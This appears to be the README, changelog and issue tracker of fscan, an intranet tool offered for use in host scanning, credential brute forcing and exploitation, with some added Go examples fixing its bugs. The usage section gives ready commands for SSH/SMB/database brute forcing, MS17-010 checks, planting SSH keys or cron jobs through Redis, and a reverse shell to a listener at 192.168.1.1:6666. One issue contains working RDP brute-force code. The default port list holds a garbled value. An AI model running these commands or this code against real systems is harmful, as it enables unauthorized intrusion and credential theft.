An all-in-one intranet scanning tool for convenient one-click, automated, comprehensive vulnerability scanning.

Overview

fscan

Introduction

fscan supports host discovery, port scanning, brute forcing of common services, ms17010, batch writing of public keys to redis, cron-job reverse shells, reading Windows NIC information, web fingerprinting, web vulnerability scanning, and more.

Main features

1. Information gathering:

  • Host discovery (icmp)
  • Port scanning

2. Brute forcing:

  • Brute forcing of various services (ssh, smb, etc.)
  • Database password brute forcing (mysql, mssql, redis, psql, etc.)

3. System information and vulnerability scanning:

  • Retrieve the target's NIC information
  • High-risk vulnerability scanning (ms17010, etc.)

4. Web probing:

  • Web title probing
  • Web fingerprinting (common CMS, OA frameworks, etc.)
  • Web vulnerability scanning (weblogic, st2, etc.; supports xray PoCs)

5. Exploitation:

  • redis: write a public key or a cron job
  • ssh command execution

6. Other:

  • Save results to a file

Usage

Basic usage

fscan.exe -h 192.168.1.1/24  (all modules are used by default)
fscan.exe -h 192.168.1.1/16  (scan a /16)

Other usage

fscan.exe -h 192.168.1.1/24 -np -no -nopoc (skip liveness detection, do not save output, skip web PoC scanning)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis: write public key)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis: cron-job reverse shell)
fscan.exe -h 192.168.1.1/24 -c whoami (run a command after a successful ssh brute force)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (select the ssh module and a port)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (load usernames and passwords from the given files for brute forcing)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (path for the result file; by default it is saved in the current directory)
fscan.exe -h 192.168.1.1/8  (for a /8, only 192.x.x.1 and 192.x.x.254 are scanned, for a quick view of which subnets are in use)
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb password spraying)
fscan.exe -h 192.168.1.1/24 -m ms17010 (select a module)
fscan.exe -hf ip.txt  (import hosts from a file)

Build command

go build -ldflags="-s -w " -trimpath

Full parameters

  -Num int
        poc rate (default 20)
  -c string
        exec command (ssh)
  -cookie string
        set poc cookie
  -debug
        debug mode will print more error info
  -domain string
        smb domain
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        host file, -hs ip.txt
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
        not to save output log
  -nopoc
        not to scan web vul
  -np
        not to ping
  -o string
        Outputfile (default "result.txt")
  -p string
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
  -ping
        using ping replace icmp
  -pocname string
        use the pocs these contain pocname, -pocname weblogic
  -proxy string
        set poc proxy, -proxy http://127.0.0.1:8080
  -pwd string
        password
  -pwdf string
        password file
  -rf string
        redis file to write sshkey file (as: -rf id_rsa.pub)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666)
  -t int
        Thread nums (default 600)
  -time int
        Set timeout (default 3)
  -u string
        url
  -uf string
        urlfile
  -user string
        username
  -userf string
        username file
  -wt int
        Set web timeout (default 5)
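The -h flag above accepts several target syntaxes (a single IP, a last-octet range, a full IP-to-IP range, a CIDR, or a comma-separated mix), the changelog notes that imported hosts are de-duplicated, and the usage section says a /8 is sampled (only .1 and .254 of each /24) rather than expanded. The parser below is an added example written for this page, not fscan's own code; it assumes IPv4 only, applies the /8 sampling rule to every prefix shorter than /16, and the function names (`ParseHosts`, `expandCIDR`, `expandRange`) are hypothetical.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"net"
	"strconv"
	"strings"
)

// ParseHosts expands the -h target syntax (single IP, "192.168.11.11-255",
// "192.168.1.1-192.168.255.255", "192.168.1.1/24", or a comma-separated mix) into a
// de-duplicated IPv4 list in first-seen order. IPv4 only (an assumption of this example).
func ParseHosts(spec string) ([]string, error) {
	seen := make(map[string]struct{})
	var out []string
	for _, item := range strings.Split(spec, ",") {
		item = strings.TrimSpace(item)
		if item == "" {
			continue
		}
		var ips []string
		var err error
		switch {
		case strings.Contains(item, "/"):
			ips, err = expandCIDR(item)
		case strings.Contains(item, "-"):
			ips, err = expandRange(item)
		case net.ParseIP(item).To4() != nil:
			ips = []string{item}
		default:
			err = fmt.Errorf("invalid IPv4 address %q", item)
		}
		if err != nil {
			return nil, err
		}
		for _, ip := range ips {
			if _, dup := seen[ip]; !dup { // a host listed twice is scanned once
				seen[ip] = struct{}{}
				out = append(out, ip)
			}
		}
	}
	return out, nil
}

// expandCIDR lists every address in the block. For prefixes shorter than /16 it applies the
// sampling the README describes for a /8: only .1 and .254 of each /24 (assumption: /9-/15 too).
func expandCIDR(cidr string) ([]string, error) {
	_, ipnet, err := net.ParseCIDR(cidr)
	if err != nil || ipnet.IP.To4() == nil {
		return nil, fmt.Errorf("invalid IPv4 CIDR %q", cidr)
	}
	first := ipToUint32(ipnet.IP)
	last := first | ^ipToUint32(net.IP(ipnet.Mask))
	if ones, _ := ipnet.Mask.Size(); ones >= 16 {
		return seq(first, last), nil
	}
	var out []string
	for block := first; ; block += 256 {
		out = append(out, uint32ToIP(block+1), uint32ToIP(block+254))
		if block+256 > last || block+256 < block { // past the block, or wrapped around
			return out, nil
		}
	}
}

// expandRange handles "a.b.c.d-N" (N replaces the last octet) and "a.b.c.d-w.x.y.z".
func expandRange(r string) ([]string, error) {
	parts := strings.SplitN(r, "-", 2)
	start := net.ParseIP(parts[0]).To4()
	if start == nil {
		return nil, fmt.Errorf("invalid range start in %q", r)
	}
	var end net.IP
	if strings.Contains(parts[1], ".") {
		end = net.ParseIP(parts[1]).To4()
	} else if n, err := strconv.Atoi(parts[1]); err == nil && n >= 0 && n <= 255 {
		end = net.IPv4(start[0], start[1], start[2], byte(n)).To4()
	}
	if end == nil || ipToUint32(end) < ipToUint32(start) {
		return nil, fmt.Errorf("invalid range end in %q", r)
	}
	return seq(ipToUint32(start), ipToUint32(end)), nil
}

// seq lists s..e inclusive without overflowing at 255.255.255.255.
func seq(s, e uint32) []string {
	out := make([]string, 0, e-s+1)
	for n := s; ; n++ {
		out = append(out, uint32ToIP(n))
		if n == e {
			return out
		}
	}
}

func ipToUint32(ip net.IP) uint32 { return binary.BigEndian.Uint32(ip.To4()) }

func uint32ToIP(n uint32) string {
	return net.IPv4(byte(n>>24), byte(n>>16), byte(n>>8), byte(n)).String()
}
```

A /24 expands to all 256 addresses, a /8 to 131072 sampled hosts, and an out-of-range last octet such as `10.0.0.1-999` is rejected instead of silently wrapping.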

Screenshots

fscan.exe -h 192.168.x.x (all features: ms17010, reading NIC information)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis: write public key)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh command)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (one-click support for xray PoCs)

References

https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc

Recent updates

[+] 2021/3/4 Support -u url or -uf url.txt for batch scanning of URLs
[+] 2021/2/25 Reworked the yaml parsing module to support password brute forcing, e.g. tomcat weak passwords. The yaml gains a sets parameter (an array) that holds the passwords; see tomcat-manager-week.yaml
[+] 2021/2/8 Added fingerprinting, which recognizes common CMS and frameworks such as 致远OA (Seeyon) and 通达OA (Tongda).
[+] 2021/2/5 Changed the icmp packet-sending mode, better suited to large-scale probing.
Changed the error reporting: with -debug, if there is no new progress within 10 seconds, the current progress is printed every 10 seconds
[+] 2020/12/12 Added a yaml parsing engine that supports xray PoCs; all PoCs are used by default (xray's PoCs have been filtered); -pocname weblogic restricts the run to one kind of PoC or a single PoC. Requires go 1.16 or later, so for now you have to build the latest go yourself to test it
[+] 2020/12/6 Optimized the icmp module; added the -domain parameter (for the smb brute-force module, for domain users)
[+] 2020/12/03 Optimized the IP-range handling, icmp, and port-scanning modules. Added support for 192.168.1.1-192.168.255.255.
[+] 2020/11/17 Added the -ping parameter, which makes the liveness module use ping instead of sending icmp packets.
[+] 2020/11/17 Added the WebScan module, with simple shiro recognition. Certificate verification is skipped for https. The timeouts of the service modules and the web module are now separate; added the -wt parameter (WebTimeout).
[+] 2020/11/16 Optimized the icmp module; added the -it parameter (IcmpThreads), default 11000, suited to scanning a /16
[+] 2020/11/15 Support importing IPs from a file, -hs ip.txt, with de-duplication

Issues
  • Build error

    D:\Code\Golang\fscan>go build -ldflags="-s -w " -trimpath

    runtime/cgo

    cgo: C compiler "gcc" not found: exec: "gcc": executable file not found in %PATH%

    This problem appeared after downloading the version that followed yesterday's go.mod update; the version from 3 days ago compiled fine.

    opened by P4r4d1se 7
  • poc-yaml-thinkadmin-v6-readfile environment creation error: unsupported type: *lib.UrlType

    Master, I modified the corresponding code according to your update, but got these errors. Do you know how to fix them? The errors are as follows:

    [-] poc-yaml-metinfo-cve-2019-17418-sqli environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-minio-default-password environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-metinfo-lfi-cnvd-2018-13393 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-apache-httpd-cve-2021-40438-ssrf environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-apache-httpd-cve-2021-41773-rce environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-apache-httpd-cve-2021-41773-path-traversal environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-laravel-debug-info-leak environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-laravel-improper-webdir environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nextjs-cve-2017-16877 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-msvod-sqli environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-myucms-lfr environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10735 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10738 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-natshell-arbitrary-file-read environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-netentsec-icg-default-password environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-netentsec-ngfw-rce environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-netgear-cve-2017-5521 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-maccms-rce environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10737 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-bash-cve-2014-6271 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-airflow-unauth environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10736 environment creation error: unsupported type: *lib.UrlType
    ……

    opened by z1mu 6
  • Suggestion: add RDP brute forcing

    Referring to https://github.com/tomatome/grdp/ it is easy to implement. The code is too ugly to post, so this is just a suggestion for the master.

    package Plugins

    // Imports assume the code sits in fscan's Plugins package (import paths taken from
    // the project's own build output and the grdp repository linked above).
    import (
    	"fmt"
    	"strconv"
    	"strings"
    	"time"

    	"github.com/shadow1ng/fscan/common"
    	"github.com/tomatome/grdp"
    )

    // RdpScan tries each user/password pair from the rdp dictionary against
    // info.Host:info.Ports and stops at the first success, at an error that
    // common.CheckErrs treats as fatal, or when the overall time budget is exhausted.
    func RdpScan(info *common.HostInfo) (tmperr error) {
    	if common.IsBrute {
    		return
    	}
    	// Parse the port once, outside the loops, and do not discard the conversion error.
    	port, err := strconv.Atoi(info.Ports)
    	if err != nil {
    		return fmt.Errorf("rdp: invalid port %q: %v", info.Ports, err)
    	}
    	starttime := time.Now().Unix()
    	for _, user := range common.Userdict["rdp"] {
    		for _, pass := range common.Passwords {
    			pass = strings.Replace(pass, "{user}", user, -1)
    			flag, err := RdpConn(info.Host, info.Domain, user, pass, port)
    			if flag && err == nil {
    				result := fmt.Sprintf("[+] RDP:%v:%v:%v %v", info.Host, info.Ports, user, pass)
    				common.LogSuccess(result)
    				return err
    			}
    			errlog := fmt.Sprintf("[-] rdp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
    			common.LogError(errlog)
    			tmperr = err
    			if common.CheckErrs(err) {
    				return err
    			}
    			// Give up once the whole dictionary's worth of timeouts has elapsed.
    			if time.Now().Unix()-starttime > (int64(len(common.Userdict["rdp"])*len(common.Passwords)) * info.Timeout) {
    				return err
    			}
    		}
    	}
    	return tmperr
    }

    // RdpConn performs a single RDP login through grdp and reports whether it succeeded.
    func RdpConn(ip, domain, login, password string, port int) (bool, error) {
    	target := fmt.Sprintf("%s:%d", ip, port)
    	err := grdp.Login(target, domain, login, password)
    	if err != nil {
    		return false, err
    	}
    	return true, nil
    }
    
    opened by Alberthchang 6
  • Some suggestions from a friend of mine

    A: What did you say was wrong with the latest fscan?

    XXXXXX: Still garbled characters

    A: Anything else?

    XXXXXX: I mean the garbled characters in result.txt

    A: [image]

    A: He only handles these three encodings; ISO is also common and wasn't included

    XXXXXX: I see, I'll open an issue for him

    A: Quicker to change it yourself

    A: [image]

    A: Everything except 443 is accessed over http; no wonder things get missed

    XXXXXX: Keep filing issues

    XXXXXX: Tell him to try both

    A: Let me finish reading first; there seems to be a function later that recognizes https, and some other handling too

    A: It really does only recognize port 443. Also, for 302 redirects it only follows once; yesterday several sites I brute-forced redirected three times, although on a first login there is usually only one redirect

    XXXXXX: Open an issue for him

    A: You do it

    A: I don't freeload

    opened by lovelyjuice 6
  • BUG with -np (ping disabled)

    Environment: macOS (works fine on Windows)

    Thanks for the author's hard work

    Normal case:

    go run main.go -h 172.20.10.1/24
    
    (Ping) Target '172.20.10.15' is alive
    (Ping) Target '172.20.10.1' is alive
    (Ping) Target '172.20.10.3' is alive
    icmp alive hosts len is: 3
    172.20.10.1:21 open
    

    With -np the scan produces errors and never finishes on its own.

    go run main.go -h 172.20.10.1/24 -np
    
    172.20.10.63:21 open
    172.20.10.29:21 open
    172.20.10.62:21 open
    open result.txt: too many open files
    open result.txt: too many open files
    172.20.10.64:21 open
    open result.txt: too many open files
    172.20.10.54:21 open
    open result.txt: too many open files
    ...
    
    opened by butnomingzi 6
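The "open result.txt: too many open files" lines above are a file-descriptor exhaustion: with ping disabled every host in the /24 is probed at once, and if each reporting goroutine opens the result file itself, hundreds of handles are open simultaneously and the process limit is hit. The added example below (written for this page, not fscan's code; `ResultLog`, `naiveWrite` and `ScanAndRecord` are hypothetical names) shows the per-call open pattern next to the single-writer pattern, where one goroutine owns the only handle and the scanners just send lines on a channel, so the descriptor count stays at one whatever the thread count.

```go
package main

import (
	"bufio"
	"os"
	"sync"
	"sync/atomic"
)

// ResultLog owns the single open handle to the result file. Scanner goroutines only
// send strings on a channel; one writer goroutine drains it, so however many
// goroutines report at once, exactly one descriptor is in use.
type ResultLog struct {
	lines chan string
	done  chan struct{}
	err   error // first write error, read only after done is closed
}

// NewResultLog opens path once and starts the writer goroutine.
func NewResultLog(path string) (*ResultLog, error) {
	f, err := os.OpenFile(path, os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0o644)
	if err != nil {
		return nil, err
	}
	l := &ResultLog{lines: make(chan string, 1024), done: make(chan struct{})}
	go func() {
		defer close(l.done)
		defer f.Close()
		w := bufio.NewWriter(f)
		for line := range l.lines {
			if _, werr := w.WriteString(line + "\n"); werr != nil && l.err == nil {
				l.err = werr
			}
		}
		if ferr := w.Flush(); ferr != nil && l.err == nil {
			l.err = ferr
		}
	}()
	return l, nil
}

// Write queues a line; it blocks only if the writer falls 1024 lines behind.
func (l *ResultLog) Write(line string) { l.lines <- line }

// Close waits until every queued line is on disk and reports the first write error.
func (l *ResultLog) Close() error {
	close(l.lines)
	<-l.done
	return l.err
}

// naiveWrite is the pattern that breaks under -np: every caller opens the file
// itself, so N concurrent callers hold N descriptors and exhaust the process limit.
func naiveWrite(path, line string) error {
	f, err := os.OpenFile(path, os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0o644)
	if err != nil {
		return err // this is where "open result.txt: too many open files" surfaces
	}
	defer f.Close()
	_, err = f.WriteString(line + "\n")
	return err
}

// ScanAndRecord runs probe for every host in its own goroutine (fscan's default is
// 600 threads) and records each result line through the single writer.
// It returns the number of lines recorded. probe is injected so the example runs offline.
func ScanAndRecord(path string, hosts []string, probe func(host string) []string) (int, error) {
	log, err := NewResultLog(path)
	if err != nil {
		return 0, err
	}
	var wg sync.WaitGroup
	var n int64
	for _, h := range hosts {
		wg.Add(1)
		go func(h string) {
			defer wg.Done()
			for _, line := range probe(h) {
				log.Write(line)
				atomic.AddInt64(&n, 1)
			}
		}(h)
	}
	wg.Wait()
	if err := log.Close(); err != nil {
		return int(n), err
	}
	return int(n), nil
}
```

Because `Close` waits for the writer goroutine, every line sent before it is guaranteed to be flushed, which is also what lets a scan terminate cleanly instead of hanging with errors as described in the issue.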
  • Hello, getting "undefined: MS17010EXP" and "not enough arguments in call to" errors

    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go env -w GOPROXY=https://goproxy.cn,direct
    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go mod tidy
    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go build -ldflags="-s -w " -trimpath

    github.com/shadow1ng/fscan/Plugins

    Plugins\ms17010.go:133:4: undefined: MS17010EXP
    Plugins\scanner.go:16:28: not enough arguments in call to "github.com/shadow1ng/fscan/common".ParseIP
            have (string, string)
            want (string, string, string)

    opened by sevendian 5
  • With version 1.5.1, ssh and smb brute forcing has problems

    I am currently doing an internal security review of a /16 at my company and found that after updating, the SSH and SMB brute-force results both seem to be empty. The default is 600 threads; for accuracy we set the threads to 100 and still did not get the expected results. The account and password (which are confirmed correct) are passed via parameters, with the following command: ./fscan_amd64_upx -h 10.x.0.1/16 -user xxx -pwd xxx -t 100

    opened by ghost 5
  • [Chore] license

    Hi,

    Could you choose a license so we can include your tool in BlackArch Linux?

    Here are the consequences of no license and why we can't share it: https://choosealicense.com/no-permission/

    Thanks

    opened by noraj 4
  • Build fails with the go build -ldflags="-s -w " -trimpath main.go command

    This warning appears: go: github.com/denisenkom/[email protected]: git init --bare in C:\Users\用户\go\pkg\mod\cache\vcs\827fc7d8d4932fa3c473f8716b1123200a0073784d1f12e94bbeb63e9646f34f: exec: "git": executable file not found in %PATH%

    opened by W-Beacon 8
  • The program crashes when scanning multiple ranges with ports 1-65535

    [*] Icmp alive hosts len is: 16384
    runtime: VirtualAlloc of 25769410560 bytes failed with errno=1455
    fatal error: out of memory
    
    runtime stack:
    runtime.throw({0xad0738, 0xc205de6000})
            runtime/panic.go:1198 +0x76
    runtime.sysUsed(0xc001770000, 0x5fffa0000)
            runtime/mem_windows.go:83 +0x1c9
    runtime.(*mheap).allocSpan(0x180fd60, 0x2fffd0, 0x0, 0x0)
            runtime/mheap.go:1268 +0x3a5
    runtime.(*mheap).alloc.func1()
            runtime/mheap.go:913 +0x69
    runtime.systemstack()
            runtime/asm_amd64.s:383 +0x4e
    
    goroutine 1 [running]:
    runtime.systemstack_switch()
            runtime/asm_amd64.s:350 fp=0xc0000a7968 sp=0xc0000a7960 pc=0x2d2080
    runtime.(*mheap).alloc(0x5fffa0000, 0x2fffd0, 0x0, 0x1)
            runtime/mheap.go:907 +0x73 fp=0xc0000a79b8 sp=0xc0000a7968 pc=0x2963b3
    runtime.(*mcache).allocLarge(0x127f3fabb00, 0x5fffa0000, 0x60, 0x0)
            runtime/mcache.go:227 +0x89 fp=0xc0000a7a18 sp=0xc0000a79b8 pc=0x286c29
    runtime.mallocgc(0x5fffa0000, 0xa17f60, 0x1)
            runtime/malloc.go:1082 +0x5c5 fp=0xc0000a7a98 sp=0xc0000a7a18 pc=0x27d045
    runtime.makechan(0x0, 0x3fffc000)
            runtime/chan.go:106 +0xe5 fp=0xc0000a7ad8 sp=0xc0000a7a98 pc=0x275345
    github.com/shadow1ng/fscan/Plugins.PortScan({0xc00082e000, 0x4000, 0xc0000a7e28}, {0xc0000320f8, 0x7}, 0x3)
            github.com/shadow1ng/fscan/Plugins/portscan.go:39 +0x2f4 fp=0xc0000a7cc8 sp=0xc0000a7ad8 pc=0x9407d4
    github.com/shadow1ng/fscan/Plugins.Scan({{0x0, 0x0}, {0xc0000320f8, 0x7}, {0x0, 0x0}, {0x0, 0x0, 0x0}})
            github.com/shadow1ng/fscan/Plugins/scanner.go:37 +0x310 fp=0xc0000a7ef8 sp=0xc0000a7cc8 pc=0x946a30
    main.main()
            github.com/shadow1ng/fscan/main.go:14 +0x85 fp=0xc0000a7f80 sp=0xc0000a7ef8 pc=0x94cf65
    runtime.main()
            runtime/proc.go:255 +0x217 fp=0xc0000a7fe0 sp=0xc0000a7f80 pc=0x2a8f97
    runtime.goexit()
            runtime/asm_amd64.s:1581 +0x1 fp=0xc0000a7fe8 sp=0xc0000a7fe0 pc=0x2d4401
    
    goroutine 6 [sleep]:
    time.Sleep(0x2540be400)
            runtime/time.go:193 +0x133
    github.com/shadow1ng/fscan/common.init.0.func1()
            github.com/shadow1ng/fscan/common/flag.go:15 +0x2e
    created by github.com/shadow1ng/fscan/common.init.0
            github.com/shadow1ng/fscan/common/flag.go:11 +0x25
    
    goroutine 7 [chan receive]:
    github.com/shadow1ng/fscan/common.SaveLog()
            github.com/shadow1ng/fscan/common/log.go:32 +0x54
    created by github.com/shadow1ng/fscan/common.init.1
            github.com/shadow1ng/fscan/common/log.go:22 +0x25
    
    opened by SkyBlueEternal 0
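The trace above explains its own numbers: `PortScan` calls `makechan` with capacity 0x3fffc000 = 1073725440, which is exactly 16384 live hosts times 65535 ports, and with a 24-byte element (a string header plus an int) that is the 25769410560-byte `VirtualAlloc` that fails. A task channel sized to the whole host×port product grows without bound with the target count. The added example below (written for this page, not fscan's `PortScan`; `target`, `BufferedChanBytes` and `ScanPorts` are hypothetical names) reproduces that arithmetic and shows the alternative: a channel bounded by the worker count, which the producer fills as workers drain it, so memory stays flat whatever the scan size. The probe function is injected so the example runs offline.

```go
package main

import (
	"fmt"
	"sort"
	"sync"
	"unsafe"
)

// target is one host:port pair; on amd64 it is 24 bytes (16-byte string header + 8-byte int).
type target struct {
	host string
	port int
}

// BufferedChanBytes is what make(chan target, hosts*ports) asks the runtime for.
// With 16384 live hosts and ports 1-65535 that is 16384*65535*24 = 25769410560 bytes,
// the figure in the VirtualAlloc failure in the trace above.
func BufferedChanBytes(hosts, ports int, elemSize uintptr) uint64 {
	return uint64(hosts) * uint64(ports) * uint64(elemSize)
}

// ScanPorts feeds host:port pairs through a channel whose capacity depends only on the
// worker count, so memory use does not grow with the number of targets. probe stands in
// for the dial (constructed here); open pairs are returned sorted for a deterministic result.
func ScanPorts(hosts []string, ports []int, workers int, probe func(host string, port int) bool) []string {
	tasks := make(chan target, workers*2) // bounded: a few hundred entries, never hosts*ports
	var (
		mu   sync.Mutex
		open []string
		wg   sync.WaitGroup
	)
	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for t := range tasks {
				if probe(t.host, t.port) {
					mu.Lock()
					open = append(open, fmt.Sprintf("%s:%d", t.host, t.port))
					mu.Unlock()
				}
			}
		}()
	}
	for _, h := range hosts { // the producer blocks while workers are busy instead of buffering
		for _, p := range ports {
			tasks <- target{host: h, port: p}
		}
	}
	close(tasks)
	wg.Wait()
	sort.Strings(open)
	return open
}

func main() {
	fmt.Printf("a chan for 16384 hosts x 65535 ports would need %d bytes\n",
		BufferedChanBytes(16384, 65535, unsafe.Sizeof(target{})))
	hosts := []string{"10.0.0.1", "10.0.0.2"} // constructed sample targets
	ports := make([]int, 0, 65535)
	for p := 1; p <= 65535; p++ {
		ports = append(ports, p)
	}
	fake := func(host string, port int) bool { return port == 22 || port == 445 } // constructed stand-in for a dial
	fmt.Println(ScanPorts(hosts, ports, 600, fake))
}
```

With 600 workers the channel holds at most 1200 entries (under 30 KB) regardless of whether the input is one host or the 16384 of the trace.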
  • 302 redirect handling

    If the target URL keeps returning 302 redirects, the title scan follows up to 10 redirects and then no PoC scan is performed. Could the number of redirects followed be capped, and the PoC scan still run once the limit is reached? For a test environment you can use vulhub: https://github.com/vulhub/vulhub/tree/master/nginx/insecure-configuration

    opened by qiaoba22 0
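The behaviour the issue asks for, capping redirect hops but still handing the last response to the later scan stages, is what Go's `http.Client` does when `CheckRedirect` returns `http.ErrUseLastResponse`; the client's stock policy instead gives up after 10 redirects with an error and no usable response, which matches the symptom above. The added example below is written for this page and is not fscan's code: `FetchWithCap`, `FetchDefault` and `loopTransport` are hypothetical names, and the redirect loop is simulated by an in-memory `RoundTripper` (every request gets a 302 to a constructed location), so nothing touches the network.

```go
package main

import (
	"fmt"
	"net/http"
	"sync/atomic"
)

// loopTransport is a constructed stand-in for a target that answers every request with a
// 302 to a fresh location, i.e. a redirect loop. It counts requests and uses no network.
type loopTransport struct{ hits int64 }

func (t *loopTransport) RoundTrip(req *http.Request) (*http.Response, error) {
	n := atomic.AddInt64(&t.hits, 1)
	return &http.Response{
		StatusCode: http.StatusFound,
		Status:     "302 Found",
		Header:     http.Header{"Location": {fmt.Sprintf("http://target.example/login?hop=%d", n)}},
		Body:       http.NoBody,
		Request:    req,
	}, nil
}

// FetchWithCap GETs url through rt and follows at most maxRedirects redirects. Past the
// cap it returns the last 3xx response instead of an error, so later stages (title
// extraction, PoC checks) still have a response to work with.
func FetchWithCap(rt http.RoundTripper, url string, maxRedirects int) (status, followed int, err error) {
	client := &http.Client{
		Transport: rt,
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			// via holds every request issued so far, so len(via) is the number of this redirect
			if len(via) > maxRedirects {
				return http.ErrUseLastResponse // stop following, but keep the response
			}
			followed = len(via)
			return nil
		},
	}
	resp, err := client.Get(url)
	if err != nil {
		return 0, followed, err
	}
	defer resp.Body.Close()
	return resp.StatusCode, followed, nil
}

// FetchDefault uses the client's stock policy: after 10 redirects it fails with
// "stopped after 10 redirects", which is the point at which a scan has nothing to continue with.
func FetchDefault(rt http.RoundTripper, url string) (int, error) {
	resp, err := (&http.Client{Transport: rt}).Get(url)
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()
	return resp.StatusCode, nil
}

func main() {
	tr := &loopTransport{}
	status, followed, err := FetchWithCap(tr, "http://target.example/", 3)
	fmt.Printf("capped:  status=%d followed=%d requests=%d err=%v\n", status, followed, tr.hits, err)
	tr = &loopTransport{}
	_, err = FetchDefault(tr, "http://target.example/")
	fmt.Printf("default: requests=%d err=%v\n", tr.hits, err)
}
```

With a cap of 3 the client issues four requests, follows three redirects and returns the fourth 302 unchanged; the default client issues ten and returns an error.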
  • fatal error: runtime: out of memory

    ./fscan_amd64 -hf pool.txt -nopoc -nobr -np -o results.txt


    fscan version: 1.8.1
    start infoscan
    fatal error: runtime: out of memory

    runtime stack:
    runtime.throw({0xc602a5, 0x14ebc00000})
            runtime/panic.go:1198 +0x71
    runtime.sysMap(0xc0c7400000, 0x4296e0, 0xc000661e90)
            runtime/mem_linux.go:169 +0x96
    runtime.(*mheap).grow(0x19895c0, 0xa75df1)
            runtime/mheap.go:1393 +0x225
    runtime.(*mheap).allocSpan(0x19895c0, 0xa75df1, 0x0, 0x0)
            runtime/mheap.go:1179 +0x165
    runtime.(*mheap).alloc.func1()
            runtime/mheap.go:913 +0x69
    runtime.systemstack()
            runtime/asm_amd64.s:383 +0x49

    goroutine 1 [running]:
    runtime.systemstack_switch()
            runtime/asm_amd64.s:350 fp=0xc00030d968 sp=0xc00030d960 pc=0x460d00
    runtime.(*mheap).alloc(0x14ebbe2000, 0xa75df1, 0x0, 0x1)
            runtime/mheap.go:907 +0x73 fp=0xc00030d9b8 sp=0xc00030d968 pc=0x425933
    runtime.(*mcache).allocLarge(0x7ff19554eec8, 0x14ebbe2000, 0x60, 0x0)
            runtime/mcache.go:227 +0x89 fp=0xc00030da18 sp=0xc00030d9b8 pc=0x4165a9
    runtime.mallocgc(0x14ebbe2000, 0xb9e860, 0x1)
            runtime/malloc.go:1082 +0x5c5 fp=0xc00030da98 sp=0xc00030da18 pc=0x40cb25
    runtime.makechan(0x0, 0xdf27ec00)
            runtime/chan.go:106 +0xe5 fp=0xc00030dad8 sp=0xc00030da98 pc=0x405005
    github.com/shadow1ng/fscan/Plugins.PortScan({0xc039380000, 0x1060e00, 0x7ffdc83c37f6}, {0xc0001e0480, 0x45c}, 0x3)
